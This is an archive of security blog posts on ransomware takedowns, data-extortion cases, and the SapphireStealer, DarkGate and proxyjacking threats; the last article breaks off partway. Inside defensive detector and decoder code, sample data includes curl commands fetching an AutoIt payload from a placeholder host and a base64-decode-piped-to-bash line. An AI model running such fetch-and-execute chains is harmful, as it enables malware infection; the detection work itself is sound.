Cybercrime Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Last updated: Thu, 28 Dec 2023 10:20:31 +0000

Integris Health Hacked, Patients Receive Ransom Emails
https://gridinsoft.com/blogs/integris-health-patients-ransom-emails/
Thu, 28 Dec 2023 10:20:31 +0000

The post Integris Health Hacked, Patients Receive Ransom Emails appeared first on Gridinsoft Blog.

Integris Health, Oklahoma’s largest not-for-profit health network, fell victim to a sophisticated cyberattack that compromised sensitive patient data. The incident has had an unusual consequence: patients of Integris Health in Oklahoma have started receiving extortion emails. The emails threaten to sell their data to other malicious actors unless they pay the extortion demand.

Integris Health Patient Data Extortion

By December 24, Integris Health patients reported receiving extortion emails. The attackers, claiming to have exfiltrated the personal data of over 2 million individuals, demanded payment to prevent the sale of this information. The extortion emails included links to a dark website where around 4,674,000 records were purportedly available.

A darknet site with patient data

The website provided choices to either delete or view the data upon payment. However, it is unclear whether there are duplicate records among all of them. The compromised data comprised Social Security Numbers, birthdates, addresses, insurance, and employment details. This fact was confirmed by patients who identified their personal information in those emails.

Incident Background

In November 2023, Integris Health detected unauthorized activities within its network. An investigation revealed that an unidentified party accessed confidential patient files on November 28. It is unknown at this time exactly what information was compromised.

Integris Health reports that the investigation is still ongoing. However, given the attack’s scale, cybercriminals likely gained access to a wide range of data, including names, addresses, insurance policy numbers, dates of birth, medical records, and other personal information.

Integris Responds to Ransom Emails

Integris Health has updated its security advisory, warning patients against interacting with the extortion emails. Notably, this incident follows a pattern similar to the one observed in the Fred Hutchinson Cancer Center attack, which suggests a potential link between the threat actors.

The dilemma faced by victims is whether to pay the ransom to protect their identity. However, paying the ransom does not guarantee that the data will be kept safe or deleted. It also potentially marks the payer as a target for future extortion attempts.

Is It A New Cybercrime Meta?

The tactic of directly contacting users whose data was leaked is rather new, but it looks like a natural fit for the modern threat landscape. While ransomware gangs like BlackCat pressure companies into paying by reporting the hacks to the SEC, the hackers behind the Integris hack opted for this peculiar approach. Overall, such unusual steps appear to be, if not a new extortion method, then at least a new way to pressure victims into paying the ransom.

The intimidation factor is the most striking part. When it comes to multi-billion dollar companies listed on stock exchanges, it is much more than a feeling of embarrassment. Hackers are unlikely to start messaging every individual victim, as such a practice is simply counter-productive. With large companies, however, it is essential to expect and be ready for the new tricks hackers come up with.


Dharma Ransomware Criminals Captured in Ukraine, Europol Reports
https://gridinsoft.com/blogs/dharma-ransomware-captured/
Tue, 28 Nov 2023 14:18:54 +0000


On November 28, 2023, Europol announced the detention of ransomware operators linked to the Dharma and Hive ransomware families. The operation took place in four Ukrainian cities and is most likely a continuation of a similar operation in 2021.

Dharma Ransomware Actors Detained in Ukraine

In a statement on its official website, Europol reported searches of 30 properties in four Ukrainian cities: Kyiv, Cherkasy, Vinnytsia and Rivne. During the action, law enforcement detained the group’s key member and several other actors. The searches also resulted in the seizure of a large amount of data related to the criminal activity.

Ukrainian Cyberpolice during the searches

The detained persons are charged with compromising corporate networks in more than 70 countries and with laundering cryptocurrency. The hackers penetrated networks using phishing, vulnerability exploitation and similar tactics, then used other tools to expand their presence in the environment and launch the ransomware attack. Overall, the cybercriminals encrypted over 250 servers belonging to different companies, resulting in multi-million euro losses.

Europol has established the suspects’ links to the Dharma and Hive (now defunct) ransomware groups. The investigation also shows that the hackers were involved in spreading MegaCortex and LockerGoga ransomware back in late 2019. Dharma is the most active of the named families, though it remains a minor player in the modern threat landscape.

This operation adds to the list of anti-cybercrime actions taking place in Ukraine. Back in 2021, key criminals behind the Emotet malware were detained. Another operation that year led to the imprisonment of several cybercriminals related to the same Dharma gang. And even now, amid the war, local law enforcement is able to cooperate effectively with international agencies and combat cybercrime.

Europol Detains Group Members – But Why?

As usual, physically detaining cybercriminals took quite some time and required a team of investigators to perform property searches. This practice has apparently become less common lately, as law enforcement increasingly combats cybercrime in a different way.

The “Duck Hunt” operation, performed by the FBI in summer 2023, took place exclusively in the cloud. Law enforcement managed to detect and seize the entire network of QakBot’s tier 2 command servers and removed the malware from infected devices. The same happened to the IPStorm botnet: the FBI beheaded the network of infected systems by seizing the command server and detaining its creator.

Is this practice effective? Yes, as it disrupts the malware operations and makes it impossible for the hackers to carry on. At the same time, though, the hackers remain free, and nothing stops them from joining other cybercrime groups. While it decreases activity for a short period, this approach does not make much difference in the long run.

Ragnar Locker Ransomware Shutdown, Infrastructure Seized
https://gridinsoft.com/blogs/ragnar-locker-ransomware-shutdown/
Fri, 20 Oct 2023 14:23:29 +0000


On October 19, 2023, a group of international law enforcement agencies announced the seizure of the Ragnar Locker ransomware gang’s server infrastructure. This appears to be a new trend, as it is the third widely discussed infrastructure seizure in the last two months.

What is the Ragnar ransomware group?

Ragnar, a.k.a. Ragnar_Locker or RagnarLocker, is a cyber extortion gang that runs ransomware attacks on corporations. Double extortion and ransom sums negotiated on a Darknet page are common practices among modern hacker groups. However, the gang does not appear to operate on the Ransomware-as-a-Service model used by the vast majority of other gangs.

Ransom note of Ragnar Ransomware

The key attack vectors used by these hackers are exploiting vulnerabilities in network protocols or cloud applications. Additionally, Ragnar is known for cooperating with cybercriminals who provide initial access. Ransomware deployment is not a mandatory part of their attacks: there were cases where the attack consisted solely of data exfiltration.

But why did law enforcement pay so much attention to RagnarLocker? The answer becomes obvious when you look at the victims of this ransomware. Capcom, Campari, the City of Antwerp, Energias de Portugal, ADATA – these and numerous other companies and municipalities were struck. They were not just spooking small companies; they regularly went after serious targets.

RagnarLocker Shut Down By the FBI & European Law Enforcement

On October 19, Europol announced the disruption of Ragnar Locker ransomware operations as the result of a successful action that consisted of locating and seizing the servers belonging to the gang. This mirrors the method the FBI used in Operation Duck Hunt, which took down the entire QakBot botnet in late August 2023.

Another similar event occurred days ago, when the Ukrainian Cyber Alliance wiped the network infrastructure of Trigona Ransomware. As I said in the introduction, this appears to be a new trend. And its adoption is understandable – it is much faster, and still effective, compared to detaining the key actors of an organised crime gang.

Current view of the Darknet negotiation site of Ragnar Ransomware

Currently, the visible effect of the infrastructure takedown is the banner on RagnarLocker’s Darknet negotiation site. Seizing the network infrastructure does more than make malware operations impossible. Most likely, all the decryption keys, along with the decryptor utilities the hackers were offering for hundreds of thousands of dollars, are now in the hands of law enforcement.

Is this the Ragnarok for Ragnar Locker?

The effect of a complete confiscation of network infrastructure is hard to overstate. Even though the threat actors are not detained and can keep working, there is a lot of work to recover the servers. Moreover, funding during this recovery is questionable – law enforcement could have accessed the hackers’ crypto wallets as well.

My guess is that group members will simply move to other ransomware gangs, abandoning their own. RagnarLocker never showed much attachment to its brand name, so there won’t be many factors stopping this step. Though, we haven’t seen “full-fledged” gang dissolutions since the Conti shutdown in 2022. Maybe it will be different this time?


Trigona Ransomware Hacked by Ukrainian Cyber Alliance
https://gridinsoft.com/blogs/trigona-ransomware-hacked-ukrainian-cyber-alliance/
Wed, 18 Oct 2023 10:58:45 +0000


Trigona ransomware, a novice threat actor active since late 2022, had its servers “exfiltrated and wiped” by the Ukrainian Cyber Alliance (UCA). The hacktivists also claim that the backups of Trigona’s network infrastructure were wiped.

What is Trigona Ransomware?

Trigona is a relatively new ransomware actor, active for around a year at the time of writing (since October 2022). Despite that, the hackers have shown significant activity from the very beginning, exploiting various vulnerabilities, particularly in MSSQL and popular software. They also do not shy away from using compromised business emails collected in the early stages of an attack or even in previous hacks. Moreover, the gang has tried to keep up with the latest trends and released a Linux variant of their ransomware.

Trigona ransomware attack chart by country

Thorough research shows that Trigona is probably an offshoot of CryLock ransomware. Although CryLock never announced its shutdown, the group went quiet for some time, and then Trigona emerged. The new group uses almost the same tools and tactics, so it is logical to assume that one is a rebirth of the other. Others point to certain links with the ALPHV/BlackCat gang, though these appear only sporadically and are most likely coincidental.

Trigona Ransomware Hacked by Ukrainian Cyber Alliance

On October 17, 2023, the Telegram channel of the Ukrainian Cyber Alliance posted information about Trigona ransomware servers being seized and disabled. This was accompanied by a screenshot of the gang’s Darknet leak site after the hack.

Trigona Darknet site

The Ukrainian Cyber Alliance is a group of hacktivists that attacks Russian cybercrime gangs. Formed in 2014, it was a direct response to the increased volume of Russian state-sponsored attacks on Ukrainian infrastructure and companies. And, as you can see, they are still active today.

Posts on the related Telegram channel RUH8 revealed some interesting details. As it turns out, the hackers gained access to Trigona’s Confluence account earlier this month, around October 12.

RUH8 Trigona Ransomware Confluence hacked

Posts on the RUH8 admin’s Twitter account revealed that the Ukrainian hackers did more than hack and deface the Darknet site. Screenshots show that Trigona’s backups are gone as well, which makes it rather difficult to get back online quickly. Another picture shows that all the credentials and internal data were exfiltrated and deleted from the crooks’ servers.

Trigona Backups deleted

One more screenshot from the same Twitter thread shows that the hacker got hold of the cybercriminals’ entire toolkit. This means that sooner or later, a decryptor for victims of Trigona ransomware will be available.

Is Trigona Trigone now?

Not yet. Despite such a severe blow, Trigona ransomware can still recover, though it will certainly take some time to get all the infrastructure back online. Moreover, the crypto wallets are exposed as well, which calls into question their further use for funding operations. Key developers and operators would have to rebuild everything from scratch, and without pay, motivation will be quite low. The future of the Trigona group is unclear.

This is not the first time a hacker group has had its network infrastructure wrecked. The FBI’s recent operation “Duck Hunt” destroyed the huge QakBot botnet. However, the feds did not seize the tier 1 servers, where the vast majority of the infrastructure is hosted, while Trigona had everything wiped in one go. Overall, such operations can be quite effective effort-wise, as those that involve imprisoning threat actors and physically seizing assets require far more reconnaissance, legal action, real-world operations and the like. I expect to see many more of these in the future.

SapphireStealer: Stealthiness, Flexibility and Malware Delivery
https://gridinsoft.com/blogs/sapphirestealer-malware/
Tue, 05 Sep 2023 08:50:19 +0000


SapphireStealer is a new information stealer that targets browser credential databases and files containing users’ sensitive information. Its codebase was made public on GitHub on December 25, 2022.

According to the research, SapphireStealer can steal a wide range of information from the target system and is flexible in its setup and evasion methods. Attackers can use the stolen information for espionage or to demand ransom payments through extortion.

How does SapphireStealer work?

Like many other malware families that have recently emerged on the dark web, SapphireStealer is designed to collect information about the host, including browser data, files, and screenshots. The stolen data is then exfiltrated as a ZIP file via the Simple Mail Transfer Protocol (SMTP).

What sets SapphireStealer apart is that its source code was made public in December 2022, making it easier for attackers to experiment with the malware and evade detection. Some have even added new data exfiltration methods, such as a Discord webhook or the Telegram API.

Configured Discord Webhook, ready to work as a C2 relay for SapphireStealer

SapphireStealer is written in .NET and offers straightforward but effective functionality. The information it can steal includes host information, screenshots, cached browser credentials, and files that match a predefined list of file extensions stored on the system.

Upon execution, the malware checks whether any browser processes are currently running by scanning the list of running processes for names that match the following:

  • Chrome
  • Yandex
  • MS Edge
  • Opera

If it detects any matches, the malware terminates the processes using Process.Kill(). Here is an example code snippet that shows how to accomplish this task specifically for Google Chrome.

Code snippet (shown as an image in the original post)

A .NET malware downloader called FUD-Loader has been made public by the malware author. This downloader works as an add-on to the SapphireStealer module, making it capable of delivering other malware, and lets the operator retrieve additional binary payloads from attacker-controlled servers. The downloader has been used to deliver remote administration tools such as DCRat, njRAT, DarkComet, and Agent Tesla.

How to avoid attacks from SapphireStealer?

Here are some tips to reduce the risk of attacks from SapphireStealer and similar stealers:

Install updates

It is crucial to promptly update the operating system, browser, and other applications to minimize the risk of infostealers being distributed via known browser vulnerabilities.

Use multi-factor authentication

Multi-factor authentication (MFA) is an effective measure for safeguarding accounts, tools, systems, and data repositories from unauthorized access. If an intruder manages to steal your login credentials, MFA requires a second factor, making it much harder for them to get into the account. Additionally, secure password storage is a useful supplementary measure.

Avoid pirated software

Using pirated software is dangerous, as it often contains malware that the distributors bundle in to make money. It is always better to use legitimate applications. Nowadays, there are many free, freemium, and open-source alternatives that remove the need to risk using pirated software.


DarkGate Loader Expands Activity, Delivers Ransomware
https://gridinsoft.com/blogs/darkgate-loader-delivers-ransomware/
Mon, 04 Sep 2023 08:35:39 +0000


A new DarkGate malware deployment campaign has caught the attention of cybersecurity researchers. It was fueled by the developer’s decision to rent the malware out to a limited number of affiliates.

DarkGate Malware Activity Spikes as Developer Rents It Out

According to cybersecurity researchers, a new DarkGate malware campaign has caused a stir. It spreads through phishing emails and uses stolen email threads to trick users into clicking a hyperlink that downloads the malware. Initial analysis indicated that the sample was very similar to DarkGate: the initial infection routine and observed C2 communication protocol were nearly identical to past analyses of the same family. Further research confirmed, based on embedded strings and functionality, that the sample is indeed part of the DarkGate malware family. The recent surge in DarkGate activity is likely because the developer has rented out the malware to a few affiliates.

DarkGate Loader Details

DarkGate is malware sold primarily on underground forums by a user nicknamed RastaFarEye. It is designed to evade security software and can establish persistence through Windows Registry modifications and gain elevated privileges. As for damage, it steals data from web browsers, Discord, FileZilla, and other software, and connects to a command-and-control (C2) server to receive tasks. These tasks may include file enumeration, data exfiltration, launching cryptocurrency miners, capturing screenshots remotely, and executing other commands.

Spreading

Traditionally, phishing has been the primary delivery route for malware, and this case is no exception. According to some reports, 79% of malware in Q2 2023 was delivered via phishing emails. Specialists have identified two distinct DarkGate infection scenarios. In the first, an MSI installer file is the initial payload. Victims receive this file by clicking on a link included in a phishing message. The link leads to a traffic distribution system (TDS), which redirects the victim to the final payload URL for the MSI download if the attacker’s requirements are met. Opening the downloaded MSI file triggers the DarkGate infection.

Spreading the DarkGate loader through phishing emails

Experts have also discovered samples from another campaign that uses a Visual Basic script to deliver the initial payload, though it is not precisely known how the script itself reaches the victim. The script is obfuscated and contains decoy/junk code. It then invokes the curl binary that ships with Windows to download an AutoIt executable and script file from an attacker-controlled server. After that, the infection chain follows the previously described campaign.

Distributing DarkGate loader via Visual Basic script
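The VBS chain described above (script host spawns curl, then an AutoIt interpreter) leaves a distinctive parent/child footprint in process-creation telemetry. The following is an added detection example, not Gridinsoft’s code or the researchers’ rule; it runs over constructed Sysmon-style events (hostnames, PIDs, paths and the `.invalid` URLs are all made up) and flags both the weak signal (a Windows script host launching curl.exe) and the full chain.

```python
"""Detect the DarkGate VBS -> curl -> AutoIt delivery chain in process events.

Added example, not Gridinsoft's code. Input is a set of process-creation
events shaped like Sysmon Event ID 1 records flattened to JSON lines.
"""
import json
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
CURL_IMAGES = {"curl.exe"}
AUTOIT_IMAGES = {"autoit3.exe", "autoit3_x64.exe"}

# Constructed sample telemetry: one infected host (WS01) and two benign
# lookalikes (an admin running curl from cmd, a GPO logon script).
SAMPLE_EVENTS = r"""
{"ts": "2023-09-01T10:00:00", "host": "WS01", "pid": 4100, "ppid": 3000, "image": "C:\\Windows\\System32\\wscript.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmd": "wscript.exe C:\\Users\\bob\\Downloads\\invoice.vbs"}
{"ts": "2023-09-01T10:00:03", "host": "WS01", "pid": 4200, "ppid": 4100, "image": "C:\\Windows\\System32\\curl.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "cmd": "curl.exe -o C:\\Users\\bob\\AppData\\Local\\Temp\\Autoit3.exe http://cdn.example.invalid/Autoit3.exe"}
{"ts": "2023-09-01T10:00:05", "host": "WS01", "pid": 4201, "ppid": 4100, "image": "C:\\Windows\\System32\\curl.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "cmd": "curl.exe -o C:\\Users\\bob\\AppData\\Local\\Temp\\script.au3 http://cdn.example.invalid/script.au3"}
{"ts": "2023-09-01T10:00:09", "host": "WS01", "pid": 4300, "ppid": 4100, "image": "C:\\Users\\bob\\AppData\\Local\\Temp\\Autoit3.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "cmd": "Autoit3.exe C:\\Users\\bob\\AppData\\Local\\Temp\\script.au3"}
{"ts": "2023-09-01T11:30:00", "host": "WS02", "pid": 5100, "ppid": 5000, "image": "C:\\Windows\\System32\\curl.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmd": "curl.exe -I https://intranet.example.invalid/"}
{"ts": "2023-09-01T11:45:00", "host": "WS03", "pid": 6100, "ppid": 6000, "image": "C:\\Windows\\System32\\cscript.exe", "parent_image": "C:\\Windows\\System32\\gpscript.exe", "cmd": "cscript.exe //nologo C:\\Windows\\SYSVOL\\logon.vbs"}
"""


def basename(path):
    """Last path component, lower-cased, accepting either separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text):
    """Parse JSON lines into dicts with a datetime and normalised image names."""
    events = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        ev["image_name"] = basename(ev["image"])
        ev["parent_name"] = basename(ev["parent_image"])
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def script_host_spawned_curl(events):
    """Medium signal: wscript/cscript launching curl.exe is rare in normal use."""
    return [e for e in events
            if e["image_name"] in CURL_IMAGES and e["parent_name"] in SCRIPT_HOSTS]


def darkgate_chains(events, window=timedelta(minutes=10)):
    """High signal: one script-host process runs curl and then AutoIt within `window`."""
    children_by_parent = {}
    for e in events:
        if e["parent_name"] in SCRIPT_HOSTS:
            children_by_parent.setdefault((e["host"], e["ppid"]), []).append(e)

    chains = []
    for (host, ppid), children in children_by_parent.items():
        curls = [c for c in children if c["image_name"] in CURL_IMAGES]
        autoits = [c for c in children if c["image_name"] in AUTOIT_IMAGES]
        for a in autoits:
            prior = [c for c in curls if timedelta(0) <= a["ts"] - c["ts"] <= window]
            if prior:
                chains.append({
                    "host": host,
                    "script_host_pid": ppid,
                    "curl_pids": [c["pid"] for c in prior],
                    "autoit_pid": a["pid"],
                    "downloads": [c["cmd"] for c in prior],
                })
    return chains


def detect(text):
    """Run both rules and return the PIDs/chains worth alerting on."""
    events = parse_events(text)
    return {
        "script_host_curl": [e["pid"] for e in script_host_spawned_curl(events)],
        "chains": darkgate_chains(events),
    }


if __name__ == "__main__":
    print(json.dumps(detect(SAMPLE_EVENTS), indent=2))
```

The benign events (curl from cmd.exe, a logon script with no downloads) produce no alert, while the WS01 chain is reported with the two curl downloads that preceded the AutoIt launch.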

Key Action of DarkGate Loader

DarkGate is a modular loader that can deliver a variety of payloads, including ransomware, botnets, trojans, keyloggers, spyware, and DLL files, which makes it a versatile and dangerous piece of malware. The loader waits for commands from the command server; when the C2 sends a message containing the IP address of a secondary server, DarkGate fetches the payload from it.

The malware uses the DLL format to run stealthily, loading the library into memory via the system process rundll32.exe or injecting it into an application with weak or no DLL validation. It then steals confidential data such as passwords and cookies from the victim’s system, targeting web browsers, email software, and applications like Discord or FileZilla. The malware uses legitimate freeware tools published by Nirsoft to extract information, and it can query the operating system, the logged-on user, the currently running programs, and other data sources. This information is sent to the C2 server and shown in the threat actor’s panel. Additionally, the malware can collect arbitrary files from the victim system when requested through the C2 channel.

Defense evasion

After initialization, the malware enters a function identified as the “C2 main loop.” In this loop, the malware periodically checks the C2 server for new instructions, executes the received commands, and sends the results back to the C2 server. The C2 main loop supports over 100 commands, covering information gathering, self-management, self-update, stealing, crypto mining, RAT functionality, and file management. The malware contains multiple checks to evade common analysis tools: if the corresponding features are enabled and the sample detects an environment matching one of the checks, it terminates. Moreover, the malware looks for multiple well-known AV products and may alter its behavior depending on the result; the detected AV product is reported back to the C2 server. Depending on its configuration, the malware may also disguise its presence and inject itself into legitimate Windows processes.

Malware As a Service

Initially, the malware was used privately by the developer only. Now, the malware authors offer it as a subscription service, with prices ranging from $1,000 per day to $15,000 per month or $100,000 per year. Moreover, the author claims that the malware is the “ultimate tool for pentesters/redteamers” and boasts of “features that you won’t find anywhere.” Earlier versions of DarkGate also included a ransomware module. In any case, the MaaS program will likely increase the number of DarkGate campaigns, making it an ongoing threat in the future.

How to protect against DarkGate Loader?

Here are some tips on how to protect against DarkGate Loader:

  • Keep your software up to date. Software updates often include security patches that can help protect your devices from malware.
  • Be careful about what websites you visit and what links you click on. Malware, like DarkGate Loader, can spread through malicious websites and links.
  • Use a firewall to block unauthorized access to your devices. This can help prevent DarkGate Loader from infecting your devices.
  • Back up your data regularly. This way, if your devices are infected with DarkGate Loader, you can always restore your data from a backup.
  • Use a strong password manager to create and store strong passwords for your online accounts.
  • Enable two-factor authentication (2FA) for your online accounts. This will add an extra layer of security to your accounts.
  • Use an anti-malware solution with up-to-date signatures. It will help detect and remove DarkGate Loader if it does manage to infect your device.

Information Security Threats in Social Media
https://gridinsoft.com/blogs/information-security-threats-social-media/
Tue, 25 Jul 2023 19:17:13 +0000


Social media has become an important aspect of our everyday lives in this age of technology and information. Despite its numerous advantages, social media has raised concerns about protecting personal privacy. In particular, social networks pose a significant danger to information security, and this danger is rarely discussed. But is the threat real? And how can its effects be mitigated? Let’s find out.

Why Does Social Media Threaten Information Security?

Social media platforms serve as a means for users to stay connected with friends, engage with customers, and market businesses. However, a place holding such a large volume of information cannot be safe from manipulation or even outright phishing. Let’s look at the most notorious examples of infosec threats you can encounter on social networks.

Risk of social engineering attacks

Criminals are aware that individuals are likely to share personal information. Therefore, they exploit public profiles to extract valuable data that can be used for advanced social engineering attacks.

It’s essential to consider employees’ personal social media accounts as they can impact business security. Cybercriminals can use any post made on a social media profile linked to the business to compromise the company’s systems and data. The information is usually publicly visible when a digital profile is created. The more information an individual shares on their profile, the higher the risk of falling victim to cybercrime.

Image: an example of a phishing attempt on LinkedIn, one of the most popular social media platforms

Cybercriminals often exploit social media users by creating fake accounts to deceive them into providing personal information or access credentials, or into downloading malicious software through links. It’s important to stay vigilant and cautious while using social networks to avoid falling victim to such scams.

Oversharing

Individuals who frequently post personal information on social networking sites can threaten businesses. Their actions not only put themselves at risk by sharing confidential information, such as travel plans, business data, or patient information, but also provide cybercriminals with a plethora of information they can exploit in various ways. Posts alone can threaten the information security of an individual or a company, yet they are only the tip of the iceberg.

  • Whaling attacks involve gathering valuable information to target high-level executives and persuade them to perform a secondary action, such as transferring funds.
  • Spear phishing attempts are more targeted and accurate than typical phishing attempts. They focus on individuals and use specific details like current news and relevant financial documents.
  • Spoofing occurs when a cybercriminal pretends to be someone or something else to gain access to private information.
Image: example of whaling using a compromised business email (BEC)

Social media connections can create a cybersecurity risk. User activity, including likes, shares, and comments, can reveal valuable information about relationships that cybercriminals can exploit for fraudulent activities like phishing, spoofing, and impersonation.

Unsecured Portable Devices

Mobile devices are obviously the prevalent way of accessing social media. Modern security measures implemented on mobile devices and in social networks create an impression of safety, but that is in fact a misconception. The key is access to someone’s phone, laptop or other device: whoever gets in gets everything. People often rely exclusively on biometric identification, assuming nobody will try to guess the password that remains as a backup access method in case biometrics fail. And, you guessed it, they leave some of the easiest passwords to guess, like “1111” or “1234”, making it a piece of cake for hackers. This makes social media a nightmare for information security.

Image: correlation between the time needed to brute-force a password and the number of symbols in it

After such a lockpicking game, whoever accesses the device can read any information in its social media apps. This is even more efficient than using spyware or stealer malware, which cannot dump conversations in most messengers. By accessing the chats, criminals can gather not just your sensitive data but also your schedule and the schedules of other people, your company’s internal affairs, and the like. If that is not a dream for a hacker who collects data about a target, then what is?

How to Reduce Cyber Risks Using Social Media

In today’s world, businesses must have an online presence, including at least one social media platform. Social networks have become necessary for building trust, increasing visibility, receiving customer reviews, conducting research, making comparisons, and facilitating direct communication with customers. The good news is that businesses can take steps to reduce the cyber risks associated with social networks.

  • Social Media Access Control
    Limiting the number of people accessing social media accounts is essential as it reduces the potential attack surface. In the event of a data breach, identifying, containing, and mitigating the damage becomes more manageable. Assigning one person to oversee the business’s social network accounts is advisable to minimize security risks.
  • Social Media Policy Implementation
    It is essential for every member of an organization, including those in leadership positions, to have access to a well-defined social media policy. This policy should outline how to safeguard sensitive and confidential information and what actions are strictly prohibited.
  • Anti-Malware Implementation
    When dealing with unverified mobile devices, addressing security vulnerabilities can be difficult. Therefore, it is crucial that social media training emphasizes the significance of having antivirus and anti-malware software on all portable devices to safeguard against cyber attacks. This software can mitigate or resolve security threats, protecting users and their organizations.

The rise of social media has changed how we communicate and exchange information, but it has also brought about new dangers and obstacles concerning privacy and security. It is crucial to be aware of what we share on social networks and who has access to it, as well as to take measures to safeguard our data and keep ourselves informed about privacy concerns and security risks. By following recommended guidelines for using social media, such as reviewing privacy policies, modifying privacy settings, and being alert to fraudulent schemes and phishing attacks, we can reap the benefits of social media while mitigating the potential risks.

Proxyjacking: The Latest Cybercriminal Invention In Action
https://gridinsoft.com/blogs/what-is-proxyjacking/
Published: Fri, 07 Jul 2023 11:51:19 +0000

Today, in the constantly changing world of cyber threats, attackers always look for new ways to get more benefits with less effort. Recently, researchers found an example of this and called it proxyjacking for profit.

What is proxyjacking?

Proxyjacking is an attacker’s illegal use of a victim’s bandwidth for their own benefit. The closest related practice is cryptojacking, in which an attacker illegally uses the victim’s computing power to mine cryptocurrency. There is nothing new under the sun: although proxyjacking has been around for some time, it is only now that attackers have begun to use it so brazenly for profit.

First of all, cybercriminals can use proxy servers to cover their tracks: routing malicious traffic through multiple peer-to-peer nodes before it reaches its final destination makes it difficult to trace illicit actions back to their origin. Experts have found that financially motivated criminals actively attack vulnerable SSH servers, aiming to discreetly turn them into a proxy network which they then rent out to other criminals. Because proxyjacking has little or no effect on overall system stability and resource usage, it is harder to detect.

Diving into details

Experts discovered these attacks on June 8, 2023, after hackers established multiple SSH connections to honeypots managed by the Security Intelligence Response Team (SIRT). After connecting to one of the vulnerable SSH servers, the hackers deployed a Base64-encoded Bash script that enrolled the hacked system in Honeygain or Peer2Profit. The script also deployed a container, downloading the Peer2Profit or Honeygain Docker image and eliminating competitors’ containers if any were found. In addition, on the server that hosted the malicious script, researchers found cryptojacking miners, exploits, and hacking tools. In other words, the attackers either switched to proxyjacking or used it to generate additional passive income. Now we’ll explain in detail how it happened.

1. Penetration

By controlling a honeypot, experts could monitor the actions of attackers who used encoded Bash scripts. The attackers utilized double Base64 encoding to obscure their activity. However, the researchers successfully decoded the script and, through careful analysis, gained insight into the attacker’s proxyjacking methods and intended operations.
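Peeling stacked Base64 layers is the first thing an analyst does with a loader like this. The following Python is an added example written for this post, not the researchers’ tooling or the attacker’s script: it finds long Base64 tokens in a captured command line, decodes them layer by layer, and stops as soon as the result is no longer valid Base64 or turns out to be binary, so a crafted blob cannot keep the tool looping. The command line and the harmless inner script are constructed samples, and the function names (`peel_base64`, `decode_command_line`) are my own.

```python
import base64
import binascii
import re
import string

# Standard base64 alphabet plus padding and whitespace (line-wrapped blobs are common).
_B64_ALPHABET = re.compile(rb"^[A-Za-z0-9+/=\s]+$")
# Long runs of base64 characters inside a command line, e.g. `echo <blob> | base64 -d | bash`.
_B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
_PRINTABLE = set(string.printable.encode())


def looks_like_base64(data: bytes, min_len: int = 16) -> bool:
    """Cheap pre-check: only base64 characters and a length base64 can produce.

    The minimum length stops short plain words such as b"echo" (which happen to be
    syntactically valid base64) from being "decoded" into garbage bytes.
    """
    stripped = re.sub(rb"\s", b"", data)
    return (
        len(stripped) >= min_len
        and len(stripped) % 4 == 0
        and _B64_ALPHABET.match(data) is not None
    )


def peel_base64(blob: bytes, max_layers: int = 8):
    """Strip nested base64 layers until the content stops looking like base64.

    Returns (layers_removed, final_bytes). Decoding stops when a layer is not valid
    base64, when the result is not printable text (a binary payload such as an ELF
    file cannot carry another text layer), or when max_layers is reached.
    """
    current, layers = blob, 0
    while layers < max_layers and looks_like_base64(current):
        try:
            decoded = base64.b64decode(current)
        except (binascii.Error, ValueError):
            break
        layers += 1
        current = decoded
        if any(b not in _PRINTABLE for b in current):
            break  # binary payload: nothing more to peel
    return layers, current


def decode_command_line(cmdline: bytes):
    """Find every long base64 token in a captured command line and peel it.

    Returns a list of (token, layers_removed, decoded_bytes), which tells the analyst
    how many encoding layers were stacked on each blob.
    """
    results = []
    for match in _B64_TOKEN.finditer(cmdline):
        token = match.group(0)
        layers, decoded = peel_base64(token)
        if layers:
            results.append((token, layers, decoded))
    return results


# Constructed sample: a harmless stand-in for the decoded script, wrapped twice the way
# the loader described above wrapped its payload, then embedded in a typical command line.
SAMPLE_SCRIPT = b'#!/bin/bash\n# constructed stand-in for the attacker script\necho "inner layer reached"\n'
SAMPLE_DOUBLE_ENCODED = base64.b64encode(base64.b64encode(SAMPLE_SCRIPT))
SAMPLE_CMDLINE = b"sh -c 'echo " + SAMPLE_DOUBLE_ENCODED + b" | base64 -d | base64 -d | bash'"
# Constructed binary payload (fake ELF header): peeling must stop after one layer.
SAMPLE_BINARY_ENCODED = base64.b64encode(b"\x7fELF" + bytes(20))

if __name__ == "__main__":
    for token, layers, decoded in decode_command_line(SAMPLE_CMDLINE):
        print(f"{layers} base64 layer(s) removed from a {len(token)}-byte token:")
        print(decoded.decode())
```

The printable-text check is what makes the tool safe to point at unknown input: once a layer decodes to non-text, that is the final payload and it should go to a file hash and sandbox rather than back through the decoder.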

Image: implementation scheme

2. Deploying

The compromised system thus becomes a node in the Peer2Profit proxy network, using the account specified by $PACCT as the affiliate that profits from the shared bandwidth. The same was discovered for a Honeygain installation shortly after. The script is designed to be discreet and sturdy, attempting to operate regardless of the software installed on the host system. It begins by defining a few functions for later use, including a basic curl implementation. This is then used within the second function to download an actual curl binary (hosted on the distribution server as “csdark.css”). If curl is not present on the victim host, the attacker downloads it on the victim’s behalf, as it is required for this scheme to work.

3. File analysis

Analysis shows the file is a basic curl build without significant modifications; it may have additional features, but there is no evidence of harmful ones. Still, being able to inspect the source of the artifact shows it was part of a proxyjacking scheme, which emphasizes the importance of identifying all unusual artifacts. Next, the attacker’s script defines a function that moves to a writable and executable location; if no suitable directory is found, the executable terminates.

Image: VirusTotal analysis result

4. Eliminating competitors

The script’s final function sets up the bot. However, this function is commented out in the main script and replaced with possibly more effective code. Most of the action happens in the rest of the code, parts of which are redacted. The script starts by checking whether its own container is already running and then kills any rival containers that are also sharing bandwidth. This check is repeated to ensure that no other rival containers are running.
